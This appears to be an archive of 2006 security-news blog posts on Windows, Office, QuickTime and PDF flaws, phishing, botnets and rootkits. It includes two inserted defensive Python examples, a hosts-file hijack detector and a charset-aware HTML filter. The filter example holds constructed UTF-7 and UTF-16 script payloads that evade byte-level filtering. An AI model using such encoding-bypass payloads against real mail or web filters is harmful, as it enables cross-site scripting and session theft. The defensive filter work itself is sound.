Security researchers at Secunia rated the exploit as "highly critical," the software company's second most severe threat ranking, and said the attack could be used by local users to gain escalated privileges and utilized by malware writers to compromise a vulnerable system.
The Copenhagen, Denmark-based firm specifically said that the vulnerability is caused due to an error in the OS X AppleDiskImageController when the system is handling corrupted image files and can be exploited to cause a memory corruption.
Such an attack could lead to execution of arbitrary code in kernel-mode, Secunia said in a post to its Web site.

Tuesday, November 21, 2006
Vista and Office 2007 have just finished development and are being made available to corporate customers in advance of their January 30 release. But if you know where to look online, you can find both products already.
In the case of Vista, the purported "crack" isn't really a crack to get around the activation process. According to the techie hobbyist site Ars Technica, the hackers replaced components in the final code with bits from earlier betas of Vista.
This allows the would-be pirate to use a product key that worked with the betas and two release candidates and skip the entire activation process.
In the case of Office 2007, the Enterprise edition has leaked onto the Internet, and because it uses a volume license key, it does not require activation over the Internet.
The free ride won't last long. Microsoft said it was aware of the hacks, and how they were done. "The unauthorized download relies on the use of pre-RTM activation keys that will be blocked using Microsoft's Software Protection Platform. Consequently, these downloads will be of limited use," Microsoft said.
Beyond the fact that the hacked software will be shut off, installing it is just crazy, claimed Greg DeMichillie, lead analyst with research firm Directions on Microsoft.
"A whole lot of the versions of Windows XP that show up on download sites aren't just modified to bypass activation. They carry spyware. So you install them and they could immediately turn into zombies or botnets."
He pointed out that it's possible even to install a rootkit despite Vista's vaunted PatchGuard kernel protection. The rootkit can be installed to the files on the installation, which are merely compressed and not installed yet.

Sunday, November 12, 2006
It is amazing that for whatever reason people just don't get it. JUST DON'T CLICK! Nothing anyone has to sell, give away or try to lure you with via email is worth the risk.
Based on a survey of 5,000 consumers in the United States, Gartner said users are being assaulted with more phishing attacks than ever before and are falling for more of the gimmicks. Yet at the same time, customers are losing less money to the schemes, due to a growing awareness of the online fraud model, as banks and other businesses spoofed in the attacks have put more tools in place to help identify suspicious behavior.
Gartner estimates that 109 million U.S. adults received phishing e-mails during the last 12 months, compared to only 57 million in 2004. An estimated 24.4 million Americans went on to click on phishing e-mails in 2006, up from approximately 11.9 million in 2005. The company said 3.5 million adults gave sensitive information to fraudsters in 2006, compared to only 1.9 million adults last year.
Based on the survey, the average loss per victim has grown from $257 to $1,244 per victim in 2006. Finding a refund for money lost to the schemes has also become harder: Consumers recovered approximately 80 percent of their cash in 2005, but are getting back an average of only 54 percent in 2006.
Gartner analyst Avivah Litan said that among the tactics being employed successfully by phishers are efforts that launch and shut down fraudulent Web sites very quickly, so that the attacks become moving targets that are harder to stop using conventional blacklists. The average life span of a phishing site dropped to roughly one hour in 2006, whereas it was approximately one week in 2004. Litan said attackers may have already begun to create customized phishing schemes that target specific people, specifically those who appear to have more money than the average Web user.

Monday, November 06, 2006
An FBI investigation of an international ring of phishers that used the Internet to swap stolen IDs and credit cards - including information of customers of a "major financial institution" -- netted 17 hackers in the U.S. and Eastern Europe, federal law enforcement officials said.
Four U.S. arrests were made, along with 13 in Poland, including the alleged ringleader nicknamed "Blindroot." The probe, dubbed "Operation Cardkeeper," began after a "major financial institution" reported numerous phishing attacks between August and October 2004, according to FBI spokesperson Paul Bresson.
According to the FBI office in Richmond, Virginia, the group "compromised" around 50 servers in the area that were then used to launch the attacks. A common tactic of phishers is to take control of systems in order to deliver spam or porn.
The government investigation also revealed an Internet bazaar where identity thieves meet to swap stolen personal data. The forums were used "by both U.S. citizens and foreign nationals to commit financial crimes," according to the FBI.
Although no financial figures were released on how much was lost due to the phishing attacks, "hundreds of thousands of dollars" are saved when stolen financial data is intercepted by the FBI, James E. Finch, assistant director of the agency's Cyber Division said in a statement. "Cyber criminals will no longer be able to hide behind borders to conduct their illicit business," Finch said.
The government said 15 search warrants were issued, including in New York, Georgia, Nebraska, Tennessee, Ohio and Texas. Romanian law enforcement is also questioning subjects.

Sunday, October 22, 2006
Joe Stewart, senior security researcher at SecureWorks, has posted an analysis of a Trojan program called SpamThru on his company's Web site. As far as malware goes, it's a marvel.
SpamThru features a custom P2P protocol to share information with other bot-infected or compromised machines. In the event that the command-and-control server gets shut down, the spammer can redirect the hacked peers to a new master server.
SpamThru defends itself against antivirus software by rewriting the hosts file on the infected machine so virus updates can't be found. It also uses its own antivirus engine to eliminate other resident malware that might compete for resources or expose the compromised machine.
It contains its own template-driven spamming engine that's protected by AES (Rijndael) encryption. And it can generate randomized spam images to defeat pattern-based spam detection methods.
"Although we've seen automated spam networks set up by malware before (Sober, Bobax, Bagle, etc.), this is one of the more sophisticated efforts," writes Stewart. The complexity and scope of the project rivals some commercial software. Clearly the spammers have made quite an investment in infrastructure in order to maintain their level of income.
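The hosts-file trick is easy to check for. The script below is an added example, not from the SecureWorks analysis: it parses a hosts file and flags any line that pins a security-vendor or update domain, classifying loopback and 0.0.0.0 entries as sinkholed and anything else as redirected. The vendor suffix list and the sample hosts file are constructed for the demo; on Windows the real file is %SystemRoot%\System32\drivers\etc\hosts.

```python
"""Flag hosts-file entries that hijack antivirus or update domains.

Added example (not from the SecureWorks analysis). PROTECTED_SUFFIXES
and SAMPLE_HOSTS are CONSTRUCTED for the demo.
"""
import ipaddress

# Domains that should never be pinned in a hosts file (constructed,
# illustrative list; extend it with the vendors actually deployed).
PROTECTED_SUFFIXES = (
    "symantec.com", "mcafee.com", "kaspersky.com", "sophos.com",
    "f-secure.com", "windowsupdate.com", "microsoft.com",
)

# Constructed sample: a normal Windows hosts file with four lines a
# SpamThru-style bot might have appended.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
192.168.1.10    fileserver fileserver.corp.example   # legitimate LAN entry
127.0.0.1       liveupdate.symantec.com
0.0.0.0         download.mcafee.com
127.0.0.1       www.kaspersky.com kaspersky.com
10.0.0.1        windowsupdate.microsoft.com
"""


def parse_hosts(text):
    """Yield (line_no, ip, hostname) for every mapping in a hosts file.

    Comments start at '#', fields are whitespace separated, and one line
    may carry several hostnames for the same address.
    """
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # first field is not an address: malformed line, skip
        for host in fields[1:]:
            yield line_no, str(ip), host.lower().rstrip(".")


def is_protected(host):
    """True if host is a protected domain or a subdomain of one."""
    return any(host == s or host.endswith("." + s) for s in PROTECTED_SUFFIXES)


def classify(ip):
    """Loopback or 0.0.0.0 means the name was sinkholed; anything else is
    a redirect to some other machine, possibly attacker controlled."""
    addr = ipaddress.ip_address(ip)
    return "sinkholed" if addr.is_loopback or addr.is_unspecified else "redirected"


def find_hijacked(text):
    """Return [(line_no, ip, host, verdict)] for every protected domain the
    hosts file overrides, whatever address it points at."""
    return [(line_no, ip, host, classify(ip))
            for line_no, ip, host in parse_hosts(text)
            if is_protected(host)]


if __name__ == "__main__":
    for line_no, ip, host, verdict in find_hijacked(SAMPLE_HOSTS):
        print(f"line {line_no}: {host} -> {ip} ({verdict})")
```

Any hit at all is worth a look, not only the sinkholed ones: a vendor domain redirected to a routable address can serve a poisoned update, which is worse than no update.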

Tuesday, October 10, 2006
In one of its biggest releases in recent months, Microsoft Corp. today issued 10 security bulletins detailing fixes for more than two dozen separate vulnerabilities -- several of which are already being actively exploited in the wild.
But the updates were not immediately available via Microsoft Update, Automatic Update or Windows Update Services because of what the company described as "technical difficulties."
"Technical teams are engaged and have been working around the clock" to make the updates available by the end of day today, the company said in a statement. "To be clear, it's a delay due to the networking for these systems," a post on Microsoft's security response center blog said this afternoon. "There are no issues with the security updates themselves." The delay does not affect customers using Microsoft's Software Update Services, Windows Update V4 or Office Update.
Those who want to download the patches immediately can do so manually by visiting Microsoft's technet site, the blog post said.
Six of the bulletins announced today are rated as critical by Microsoft and detail fixes for a total of 16 separate flaws. The rest of the bulletins addressed vulnerabilities that were either rated as important or moderate by Microsoft.
The bulletins covered a total of 26 separate flaws and are part of Microsoft's regularly scheduled monthly security updates for October. The list of products affected includes PowerPoint, Excel and Word.
"What's interesting to note here is that six of the flaws [covered by today's bulletins] are being exploited in the wild or have proof-of-concept code available," said Tom Cross, a vulnerability researcher with Atlanta-based Internet Security Systems Inc.'s X-Force threat analysis service.
Examples of active attacks against flaws fixed today include zero-day exploits against Excel and Word, Symantec Corp. said in an advisory released this afternoon. Similar attacks or proof-of-concept attacks are also available against some of the flaws addressed in security bulletins MS06-057, MS06-058 and MS06-063, Cross said.
"Today we are seeing a record high number of vulnerabilities being patched in a single month," said Monty Izerman, a senior manager of the global threat group at McAfee Avert Labs in an e-mailed comment. Sixteen of the flaws patched today were discovered in application software products and continue a trend toward "application-based malware and application-targeted vulnerabilities," he said.
Of the fixes released today, the one described in MS06-057 is perhaps the most critical, McAfee noted. The critical flaw, which exists in Windows Shell, can be used to take complete control of compromised systems and has already been widely exploited in so-called "drive-by install" and "drive-by download" attacks via Internet Explorer, McAfee cautioned.

Sunday, October 01, 2006
On Thursday, Microsoft warned people about a vulnerability in the Windows Shell, the part of the operating system that presents the user interface. The flaw affects Windows 2000, Windows XP and Windows Server 2003 and could be exploited via the Internet Explorer Web browser through a component called WebViewFolderIcon, the company said in an advisory.
"An attacker could host a specially crafted Web site that is designed to exploit this vulnerability through Internet Explorer," Microsoft said. "An attacker who successfully exploited this vulnerability could gain the same user rights as the local user."
While sample exploit code has been published, Microsoft said it has not yet seen any related attacks. The vulnerability was actually discovered two months ago, but the code only surfaced this week, according to the French Security Incident Response Team.
Security monitoring company Secunia deems the issue "extremely critical," its most severe rating. Microsoft said it is working on a fix and plans to release it on Oct. 10 as part of its regular patch cycle. Meanwhile, it suggested several workarounds in its advisory to protect Windows systems.
On Friday, security company Determina provided a third-party fix for the flaw. It is the second time in as many weeks that an outsider has patched a flaw in a Microsoft product. Microsoft does not recommend using such third-party fixes, saying they could cause compatibility problems.
The Windows Shell bug is one of several flaws that are publicly known and for which exploit code is available, but which Microsoft has yet to patch. Cyber crooks are actively exploiting yet-to-be-fixed holes in PowerPoint, Word and IE, Microsoft has acknowledged.
Miscreants are taunting Microsoft with zero-day code, or attack code released immediately after a flaw or patch is made public, experts have said. Some security watchers have started to coin the term "zero-day Wednesday" to come after "Patch Tuesday," Microsoft's patch day on the second Tuesday of each month. Microsoft put its patches on a schedule to give IT managers time to plan and prepare.

Thursday, September 28, 2006
One day after patching a widely exploited flaw in its Internet Explorer browser, Microsoft Corp. has a new bug to worry about, this time in PowerPoint.
Attackers have been exploiting a newly discovered bug in Microsoft's Office presentation software in extremely targeted attacks, McAfee Inc. reported yesterday. Researchers were made aware of the attacks when a customer submitted two different malicious PowerPoint files, both of which exploited the same vulnerability, said Craig Schmugar, a virus researcher at McAfee. Both files installed malicious remote access Trojan software that then attempted to connect to an outside Web server, he said.
Though McAfee is not releasing technical details of the exploit, the security vendor says that it has confirmed that the attack works on three versions of Office running on the Windows 2000 operating system: Office 2000, Office XP, and Office 2003. Other platforms and other Office applications may also be affected, but McAfee has not yet had time to complete its testing, Schmugar said.
Schmugar has blogged about the issue on the Avert labs site.
Microsoft "has concluded that this issue affects users of Microsoft Office 2000, Microsoft Office 2003, and Microsoft Office XP," the company said in a statement. Microsoft and other security vendors, including Symantec Corp. and McAfee, have added signatures to their security products so that they can detect this malicious code.

Wednesday, September 27, 2006
Microsoft has released an out-of-cycle Internet Explorer update to fix a critical and widely exploited vulnerability in its Vector Markup Language (VML) implementation, but there's a general feeling among security experts that the company is shutting the stable door after the horse has bolted.
Highlighting the risks of releasing security updates on a monthly patching cycle, the software maker's MS06-055 bulletin comes a full eight days after virus hunters first spotted the zero-day attacks circulating on porn sites hosted in Russia, when security researchers at Sunbelt Software discovered an active malware attack against fully patched versions of Internet Explorer.
In eight days, the bad guys replenished their botnets, made their money and moved on to the next zero-day. Now the industry is struggling to clean up and chase the copycats.
Microsoft has maintained throughout the episode that the attacks were limited in nature, but, according to data from VeriSign's iDefense, approximately 2,000 domains were hijacked and seeded with code to redirect users to hostile VML websites.
HostGator, an ISP based in Houston, said VML attackers compromised its servers via an unrelated zero-day flaw in the cPanel control panel software distributed with hosting accounts and redirected legitimate Web sites to malicious pages hosting VML exploits. The exploits then dumped massive amounts of spyware, Trojans, bots and rootkits onto vulnerable Windows machines.
According to timestamps in the Microsoft bulletin, the company started updating the vulnerable Vgx.dll library on Sep. 18, 2006, the same day researchers at Sunbelt Software detected the exploits in the wild. It seems they cannot keep up their proactive stance when this one, at least, was clearly reactive.

Monday, September 18, 2006
A British security researcher has figured out a way to manipulate legitimate features in Adobe PDF files to open back doors for computer attacks. David Kierznowski, a penetration testing expert specializing in Web application testing, has released proof-of-concept code and rigged PDF files to demonstrate how the Adobe Reader program could be used to launch attacks without any user action.
"I do not really consider these attacks as vulnerabilities within Adobe. It is more exploiting features supported by the product that were never designed for this," said Kierznowski. "At this point, it is obvious that any malicious code [can] be launched," Kierznowski said.
The use of Web-based exploits to launch drive-by malware downloads is a well-known tactic and the discovery of PDF back doors is further confirmation that desktop programs have become lucrative targets for corporate espionage and other targeted attacks.
"One of the other interesting finds was the fact that you can back-door all Adobe Acrobat files by loading a back-doored JavaScript file into [a local] directory," Kierznowski said in a blog entry that includes the proof-of-concept exploit code.
A spokesperson from Adobe's product security incident response team said the company is aware of Kierznowski's discovery and is "actively investigating" the issue.
"Active exploitation techniques such as buffer overflows are becoming more and more difficult to find and exploit ... The future of exploitation lies in Web technologies," he said, noting that internal users are often in a "relationship of trust" with the surrounding network. Confirming a trend that sees Microsoft Office applications—Word, Excel, PowerPoint—used in zero-day attacks, Kierznowski sees a future of client-side hacking that expands the functionality of a service.
This form of hacking merely manipulates the user's client to perform a certain function, effectively using the user's circle of trust.

Wednesday, September 13, 2006
Microsoft's Patch Tuesday on Sep. 12 brought three bulletins covering three software flaws, but the day will be remembered most for an Internet Explorer mega-patch that is being re-released to address a 10th vulnerability that was missed by the software maker.
The flaw, which exists in the way IE handles long URLs when visiting Web sites using HTTP 1.1 protocol and compression, was flagged by eEye Digital Security, the same company that had its name zapped from the flaw credits when the update shipped for a second time on Aug. 24.
"We found another problem that they missed, even with the rerelease," said Marc Maiffret, chief hacking officer at eEye, in Aliso Viejo, Calif. The latest bulletin credits eEye with finding the additional bug. According to Tony Chor, group program manager in Microsoft's IE team, the additional flaw was similar to the one that caused the original rerelease but actually existed in a different location.
The embarrassing IE update episode underscores the challenges Microsoft, in Redmond, Wash., faces in shipping patches for multiple browser and operating system versions and strengthens the arguments from critics that the complex nature of the company's widely used software is a major security threat.
Multiple security flaws in Apple's QuickTime media player could put Mac and PC users at risk of malicious hacker attacks, according to a warning from the Cupertino, Calif. company.
Apple released QuickTime 7.1.3 as a high-priority update alongside warnings that maliciously crafted movie and image files could be used to execute harmful code on vulnerable computers.
The update fixes a total of seven vulnerabilities, including an integer overflow that occurs when viewing maliciously crafted movies that use the H.264 digital video codec standard.
By carefully crafting a corrupt H.264 movie, an attacker can trigger an integer overflow or buffer overflow which may lead to an application crash or arbitrary code execution with the privileges of the user, Apple warned in an advisory. The QuickTime update addresses the issue by performing additional validation of H.264 movies.
The company also warned that specially rigged QuickTime movies can lead to an application crash or arbitrary code execution because of a separate buffer overflow bug in the program. A third flaw in the way QuickTime deals with corrupt FLC movie could also lead to arbitrary code execution.

Tuesday, September 05, 2006
Malicious hackers broke into one of AT&T Inc.'s computer networks and stole credit card data and other personal information from several thousand customers who shopped at the telecommunications giant's online store.
The company said it discovered the breach last weekend for its online DSL services. Someone apparently broke into the system and glimpsed personal information from several thousand customers who purchased DSL equipment through the company's online Web store.
AT&T said it was notifying "fewer than 19,000" customers whose data was accessed during the weekend break-in, which it said was detected within hours. The company said it immediately shut down the online store, notified credit card companies and was working with law enforcement agencies to track down the hackers.
While AT&T didn't provide information about the root cause of the attack, Shlomo Kramer, CEO of security appliance maker Imperva, said there is a greater than 50 percent chance the attack was internal, perhaps by an employee.
"Maybe somebody misused their privileges and stole this information," Kramer said. "I don't know what was the case here, but a surprisingly large percent of these data-centric attacks are actually internal."
Regardless of who probed the network, Kramer said the breach is indicative of how traditional security measures, such as firewalls and intrusion prevention systems (IPS), can't totally shore up a network's defenses, especially if the attack comes from within.
AT&T said it would also pay for credit-monitoring services to assist in protecting the customers involved. The data theft involved people who had bought Digital Subscriber Line equipment for high-speed Internet access.
So far, NASA, University of California, Berkeley, various government web sites and Microsoft have been targeted. Unfortunately, the fifty or so machines publicly compromised last week are just the tip of the iceberg. These systems are just peripheral to the amount of Israeli and Arabic computers under attack, but both sides are doing their best to conceal the extent of the attacks.
Hackers from both China and the US have occasionally sparred with one another since early 2001. The initial cyberwar started after a US spy plane collided with a Chinese fighter jet in April 2001. Thousands of web sites in China and the United States were subject to defacements and hacker attacks for over a month, which earned the conflict the title of the first major cyberwar.
The difference from the Sino-American cyberwar of 2001 is that governments on all sides are participating a bit more, and damages are considerably higher as well. Lebanese newspapers report that the major Hezbollah-backed TV and radio stations have been compromised, and that whoever has retained control of these outlets is now broadcasting messages that Hezbollah's leader Hassan Nasrallah is a liar. PCs compromised in Europe and Russia have been used to send anti-Semitic and anti-Arabic hate mail. Israeli-based denial of service attacks against Hamas and Hezbollah websites have effectively crippled portions of the internet infrastructure on both sides of the conflict.
Digital warfare is certainly a component of modern warfare today: electronics espionage and jamming are almost as old as electronics themselves. This new facet of digital sabotage is another story altogether, with digital warriors partaking from the comfort of their own cable modem virtually side-by-side with government intelligence agencies hacking and counter-hacking the same targets.

Friday, August 18, 2006
Yahoo Inc. has fixed a security vulnerability in its Yahoo Mail service that could have allowed malicious hackers to hijack accounts and harm users in a variety of ways.
"We have developed a fix for this bug and have deployed it worldwide. Yahoo Mail users will not be required to take any action to be protected from this exploit," said Kelley Podboy, a Yahoo spokeswoman, via e-mail. Nir Goldshlager and Roni Bachar from Avnet, a computer security company based in Israel, discovered the vulnerability in early August.
The problem was Yahoo Mail's handling of attachments. By creating an HTML attachment with different encoding schemes, one could have bypassed Yahoo Mail's security filter and executed malicious JavaScript code, Bachar said via e-mail.
The exploit allowed the JavaScript code to be executed as soon as a recipient opened the e-mail message, even if the recipient didn't open the attachment. It was also possible to steal the recipient's Yahoo Mail cookie, hijack the session and gain access to the person's in-box. "This attack vector could be used to launch a variety of other more sophisticated attacks," Bachar wrote. These could include unleashing worms, installing keylogger programs, phishing and scanning ports on the PC.
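The failure here is the general one: the filter matched on bytes while the browser decoded those bytes according to a charset it chose itself. The page does not say which encodings Goldshlager and Bachar used; the added example below (not Yahoo's or Avnet's code) assumes two that were commonly abused in that era, UTF-7 declared in a meta tag and UTF-16 signalled by a byte-order mark, and shows a naive byte-level script filter being bypassed by both, next to a filter that first picks the charset the way a browser would and matches on the decoded text. All attachments are constructed, with a harmless alert(1) as the payload.

```python
"""Charset-aware HTML script filter versus a byte-matching one.

Added example, not Yahoo's or Avnet's code. The encodings used are
ASSUMPTIONS (the page does not name the ones in the real attack) and
every attachment below is CONSTRUCTED.
"""
import re

SCRIPT_RE = re.compile(r"<\s*script\b", re.IGNORECASE)


def naive_filter(raw: bytes) -> bool:
    """Allow (True) unless '<script' is visible in the raw bytes.
    This is the kind of check an encoding trick walks straight past."""
    return SCRIPT_RE.search(raw.decode("latin-1")) is None


def sniff_charset(raw: bytes) -> str:
    """Choose the charset a browser would: a byte-order mark wins, then a
    charset= declaration in the first kilobyte, else Latin-1."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return "utf-16"
    if raw.startswith(b"\xef\xbb\xbf"):
        return "utf-8-sig"
    m = re.search(rb"charset\s*=\s*[\"']?([\w.-]+)", raw[:1024], re.IGNORECASE)
    return m.group(1).decode("ascii").lower() if m else "latin-1"


def hardened_filter(raw: bytes) -> bool:
    """Decode as the browser will, then match on the decoded text.
    Fails closed on a charset Python cannot decode: if we cannot see what
    the browser will see, the attachment does not go through."""
    try:
        text = raw.decode(sniff_charset(raw), errors="replace")
    except LookupError:
        return False
    return SCRIPT_RE.search(text) is None


# Constructed attachments. UTF7 is hand-encoded: in UTF-7 '+ADw-' is '<'
# and '+AD4-' is '>', so the string 'script' never follows a literal '<'
# byte, yet a browser honouring the meta charset sees
# '<script>alert(1)</script>'. UTF16 carries a byte-order mark, so the
# browser decodes it as UTF-16 while a byte matcher sees '<\x00s\x00c...'.
BENIGN = b"<html><body>Your invoice is attached.</body></html>"
PLAIN = b"<html><body><script>alert(1)</script></body></html>"
UTF7 = (b'<html><head><meta http-equiv="Content-Type" '
        b'content="text/html; charset=utf-7"></head>'
        b'<body>+ADw-script+AD4-alert(1)+ADw-/script+AD4-</body></html>')
UTF16 = "<html><body><script>alert(1)</script></body></html>".encode("utf-16")


def compare(samples=None):
    """Return {name: (naive_allows, hardened_allows)} for each sample."""
    samples = samples or {"benign": BENIGN, "plain": PLAIN,
                          "utf-7": UTF7, "utf-16": UTF16}
    return {name: (naive_filter(raw), hardened_filter(raw))
            for name, raw in samples.items()}


if __name__ == "__main__":
    for name, (naive_ok, hardened_ok) in compare().items():
        print(f"{name:7s} naive={'pass' if naive_ok else 'block'} "
              f"hardened={'pass' if hardened_ok else 'block'}")
```

The lesson generalises beyond these two encodings: a content filter is only as good as its agreement with the consumer about how the bytes will be interpreted, so it must canonicalise first (charset, and in real deployments also entity and URL decoding in the contexts where the browser applies them) and refuse anything it cannot canonicalise.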

Monday, August 14, 2006
eEye Digital Security is alerting the network security community to the presence of multiple attacks circulating which leverage the attack vector recently patched as part of the MS06-040 (http://www.microsoft.com/technet/security/bulletin/MS06-040.mspx) security bulletin.
Attack Summary
Once infected, an IRC BOT is installed which allows the system to be used for Distributed Denial of Service (DDOS) attacks against other machines. In addition, the malware allows its controller (an outside user) to execute programs, update the BOT software, and exploit other machines. The malware will also attempt to disable Windows firewall and the Windows XP SP2 security alert that triggers when the system’s antivirus software is disabled.
The malware in question is leveraging the Server Service flaw that was patched last Tuesday in the Microsoft bulletin MS06-040. MS06-040 fixes a flaw in an unchecked buffer in the Server Service which allows for anonymous exploitation remotely. At the time of the bulletin’s release, US-CERT and Microsoft had claimed to have seen existing attacks on this flaw, but no evidence had been offered.
At this time there are currently two separate variants of this malware, both using a variant of publicly-disclosed exploit code for MS06-040. While both samples appear to be very similar, they each use a different executable when infecting the system. The first variant uses the file name "wgareg.exe" and the second uses "wgavm.exe". Antivirus vendors have named this threat W32.Wargbot (Symantec), Worm.IRCBOT.JK/JL (Trend Micro), IRC.Mocbot (McAfee), and IRCBOT-ST (F-Secure).
Protection
Users should apply the Microsoft patch to vulnerable systems as soon as possible. As a service to the network security community, eEye has also made available a free utility, which can scan up to 256 systems at once to check for the presence of the flaw patched by MS06-040.
Users of antivirus solutions should make sure that they have the latest signature files. As a final precaution, eEye recommends filtering TCP ports 139 and 445 at your corporate gateway and instructing users to not open any unexpected email attachments.

Saturday, August 05, 2006
Google Inc. has begun alerting users whenever they click on a search result that may take them to a dangerous Web site.
The new feature, which had been spotted earlier this week, goes live officially Friday, according to an announcement from The Stop Badware Coalition, which is collaborating with Google on this effort.
When users attempt to click over to a Web site considered to be potentially dangerous, Google shows users an alert page that informs them of the possible risk and gives them the option to click back to the results page or continue on to the questionable Web site.
The flagged Web sites have been reported as dangerous to The Stop Badware Coalition. Google will progressively replace the generic alert page with pages containing specific reports about the Web sites. The Stop Badware Coalition will provide these individual reports as well.
The Stop Badware Coalition is a nonprofit organization led by Harvard University and the University of Oxford and backed by Google, Lenovo Group Ltd. and Sun Microsystems Inc.
This new Google feature attempts to address a real problem: Search engines routinely display links to Web sites that download spyware and adware to visitors' PCs, exploit security vulnerabilities and attempt to scam users and include them in spam lists.
In the U.S., people land on malicious Web sites about 285 million times per month by clicking on search results from the five major search engines, according to a recent study conducted by McAfee Inc.'s SiteAdvisor unit.
Black Hat Briefings: Microsoft security chief Ben Fathi responds to a standing-room-only demo of a new technique used to plant an offensive rootkit in Windows Vista. LAS VEGAS—Ben Fathi slipped into the darkened, standing-room-only conference room and took a seat on the carpeted floor.
On the Black Hat stage, malware researcher Joanna Rutkowska, of COSEINC, was discussing a new technique that could plant an offensive rootkit in Windows Vista, Microsoft's "most secure ever" operating system.
As corporate vice president for Microsoft's STU (Security Technology Unit), it is Fathi's responsibility to deliver on Vista's security promise, and Rutkowska's claim—complete with live demo—that a key anti-rootkit feature can be easily defeated could be a public relations nightmare. But Fathi was unperturbed. Almost unnoticed in the crowd, he paid close attention to Rutkowska's slides and didn't even flinch when the room erupted in applause as the demo succeeded in loading unsigned code into Vista Beta 2 kernel (x64), without requiring a reboot.
During her talk, she described how scripts can be used to allocate excess amounts of memory to a process, forcing the target system to page out unused code and drivers. At this stage, Rutkowska showed how shell code could be executed inside one of the unused drivers, completely defeating the new device driver signing policy being implemented in Vista to only allow digitally signed drivers to load into the kernel.
Rutkowska created a one-click tool to plant the rootkit and used special heuristics to automatically find out how much memory should be allocated to "knock the unused driver." The shell code used in the demo successfully disabled signature checking in the rooted machine, rendering the system vulnerable to the loading of unsigned drivers.
Even as she basked in the success of the theoretical attack, Rutkowska offered Microsoft a pat on the back for its decision to block unsigned drivers. "The fact that this mechanism was bypassed does not mean that Vista is completely insecure," she said. "It's just not as secure as advertised."
Fathi did not say how Microsoft had fixed the issue in later Vista builds, but he received lots of advice and recommendations from Rutkowska.
Rutkowska said Microsoft should consider forbidding raw disk access from user mode, or encrypting the pagefile, or keeping kernel code in non-paged memory, though any of these may cause some performance impact.
On 8 August 2006 Microsoft is planning to release:
Security Updates
Ten Microsoft Security Bulletins affecting Microsoft Windows. The highest Maximum Severity rating for these is Critical. These updates will be detectable using the Microsoft Baseline Security Analyzer and the Enterprise Scan Tool. Some of these updates will require a restart.
Two Microsoft Security Bulletins affecting Microsoft Office. The highest Maximum Severity rating for these is Critical. These updates will be detectable using the Microsoft Baseline Security Analyzer. These updates may require a restart.
Microsoft Windows Malicious Software Removal Tool
Microsoft will release an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services and the Download Center. Note that this tool will NOT be distributed using Software Update Services (SUS).

Wednesday, July 12, 2006
While the once highly-feared Windows Metafile software code exploit has finally lost some of its steam, another Russia-born threat, WebAttacker, became the most widely used malware attack format in June.
Experts at SophosLabs™, Sophos's global network of virus, spyware and spam analysis centers, have discovered a Russian website that sells spyware kits, called WebAttacker, for fifteen US dollars (about ten UK pounds). The website, which refers to its creators as spyware and adware developers, markets the strengths of its kits, makes the kits available for online purchase and offers technical support to its buyers.
Included in the kits are scripts designed to simplify the task of infecting computers - the buyer spams out a message to email addresses, inviting recipients to visit a compromised website.
Samples found by Sophos's global network of monitoring stations used newsworthy topics to lure unwary users. One presented itself as a warning of the deadly H5N1 bird flu virus, providing links to a bogus website, which purported to contain advice on how to protect "you and your family". The other claims that Slobodan Milosevic was murdered and invites users to visit the site for more information. These websites then attempt to download the malicious code remotely onto the user's PC by taking advantage of known web browser and operating system vulnerabilities.
The new "feature" in this latest WebAttacker release appears to be the addition of an exploit for MS06-014 (the MDAC vulnerability, http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx). Microsoft patched this in its April release, so if you're patched, you're probably safe.
It looks as if the WebAttacker folks also pulled out some of the poorer-performing exploits that were evidently not getting enough victims to make them worthwhile. But this version does still include an exploit for a slightly older Firefox.

Saturday, July 08, 2006
According to the New York State Attorney General, Direct Revenue makes "spyware." These programs track where you go on the Internet and clutter your screen with annoying pop-up advertisements for everything from pornography to wireless phone plans. Spyware can get stuck in your computer's hard drive as you shop, chat, or download a song. It might arrive attached to that clever video you just nabbed at no charge.
A must-read article, and a podcast if you have no time to read, at Business Week! So what happens when the wicked witch is dead? They move overseas, that is what happens. Without protection, or at least the threat of action when caught, there is little any single user can do except protect themselves.
BitDefender has joined a growing list of security vendors testing tools for rootkit detection and cleanup.
The anti-virus vendor, based in Bucharest, Romania, on July 7 lifted the wraps off a new anti-rootkit utility that promises to spot and delete stealthy software programs that are used by malicious hackers to hide malware. BitDefender's rootkit cleaner will be available as a free stand-alone utility for registered beta testers.
The company's immediate plan is to add rootkit-detection features to its product suite, starting with the next iteration of its consumer Internet security suite. According to data gleaned from Microsoft's MSRT (malicious software removal tool), rootkits on Windows machines are a "potential emerging threat." Of the 5.7 million machines cleaned by the tool since January 2005, 14 percent were infected with a rootkit.
In 20 percent of the cases when a rootkit was found and removed, at least one back-door Trojan was also found, confirming suspicions that rootkits are being used to hide other pieces of malicious software from anti-virus scanners.
Microsoft has added detections for some types of rootkits to its Windows Defender desktop product, and several other security vendors—most notably F-Secure and Winternals—have shipped highly rated anti-rootkit utilities.

Monday, July 03, 2006
It's not every day that a potential security risk emerges that could affect both Microsoft's Internet Explorer and Mozilla Firefox Web browsers. But it is today. Reports abound of a flaw that exists in both browsers that could allow for unintended information disclosure that could put users at risk.
Security researcher Plebo Aesdi Nael first reported a pair of vulnerabilities on a public security mailing list. Only one of the flaws affects both IE and Mozilla browsers. Security firm Secunia has rated the flaws "less critical," but the SANS Internet Storm Center noted that the risk had "raised some of our neck hairs."
The first flaw involves HTML applications (HTAs), which, according to Microsoft, are full-fledged applications that are trusted and display only the menus, icons, toolbars, and title information that the Web developer creates. The alleged vulnerability requires a user to click on an icon which then takes advantage of the software flaw to disclose potentially confidential user information.
The second flaw involves the exploitation of the "object.documentElement.outerHTML" property. "The abuse of this property will allow an attacker to retrieve remote content in the context of the web page which is being currently viewed by the user," according to the SANS Internet Storm Center (ISC).
So an attacker could rip the data that a user has entered for other Web sites that they may be logged into and steal their user credentials for whatever malicious purpose they desire. Though Nael's original mailing list posting just identifies IE as being at risk, independent analysis by SANS ISC has shown that Firefox is vulnerable to the "object.documentElement.outerHTML" property flaw, as well.
